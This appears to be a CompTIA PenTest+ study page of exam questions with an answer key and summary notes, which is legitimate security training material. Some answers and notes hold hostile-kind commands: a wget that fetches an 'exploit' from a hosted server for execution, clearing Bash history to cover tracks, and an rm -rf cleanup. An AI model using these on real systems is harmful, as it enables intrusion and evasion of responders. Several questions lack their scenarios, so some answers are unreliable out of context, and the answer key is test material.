CompTIA PenTest+ Exam Overview

Questions and Answers

Which of the following commands will allow a penetration tester to permit a shell script to be executed by the file owner?

• chmod u+e script.sh
• chmod o+x script.sh
• chmod u+x script.sh (correct)
• chmod o+e script.sh

Which of the following actions is the tester MOST likely performing?

• Making a copy of the user’s Bash history to further enumeration
• Covering tracks by clearing the Bash history (correct)
• Redirecting Bash history to /dev/null
• Making decoy files on the system to confuse incident responders

A compliance-based penetration test is primarily concerned with:

• Obtaining specific information from the protected network.
• Determining the efficacy of a specific set of security standards. (correct)
• Bypassing protection on edge devices.
• Obtaining PII from the protected network.

Which of the following would the tester MOST likely describe as a benefit of the MITRE ATT&CK framework?

Understanding the tactics of a security intrusion can help disrupt them. (D)

Which of the following BEST describes the OWASP Top 10?

The most critical risks of web applications. (C), The risks defined in order of importance. (D)

Which of the following is the BEST method to help an attacker gain internal access to the affected machine?

Edit the smb.conf file and upload it to the server. (B)

Which of the following should the tester verify FIRST to assess risk?

Whether sensitive client data is publicly accessible. (A)

Which of the following commands could be used to download a file named exploit to a target machine for execution?

wget 10.10.51.50:9891/exploit (B)

Which of the following commands should the penetration tester run post-engagement?

rm -rf /tmp/apache (D)

Flashcards are hidden until you start studying

Study Notes

CompTIA PenTest+ Exam Overview

• Exam code: PT0-002
• Total questions: 68
• Focus: Practical skills in pentesting

Key Commands in Penetration Testing

• chmod u+x script.sh: Grants execution permission to the file owner for a shell script.
• To obscure activity, penetration testers may redirect or clear Bash history.

Persistence and Covering Tracks

• Covering tracks is critical; most likely actions include clearing Bash history after gaining system access.

Compliance-Based Penetration Testing

• Primarily concerns assessing the effectiveness of security standards rather than bypassing protections or obtaining sensitive information.

MITRE ATT&CK Framework

• Useful for understanding security intrusion tactics, helping to disrupt existing intrusions and improve security posture.

OWASP Top 10

• Represents the most critical risks in web applications.
• Does not list all risks or provide compliance guidelines; focuses on the most significant vulnerabilities.

Vulnerability Discovery and Exploitation

• Path traversal vulnerabilities can allow file uploads; editing critical configuration files (like smb.conf) may provide internal access to attackers.

Cloud Security Testing

• Initial assessment of security should verify if sensitive client data is publicly accessible before exploring other security measures.

File Transfer via HTTP Server

• python -m SimpleHTTPServer 9891 can be used to host files; the wget command allows for file download from this server.

Post-Engagement Actions

• When access has been gained, removing evidence (like temporary files created during the exploitation) is crucial for operational security.

Reporting in Static Application-Security Testing

• Final reports should include a summary of methods and action points relevant for developers, ensuring they understand both vulnerabilities and remediation strategies.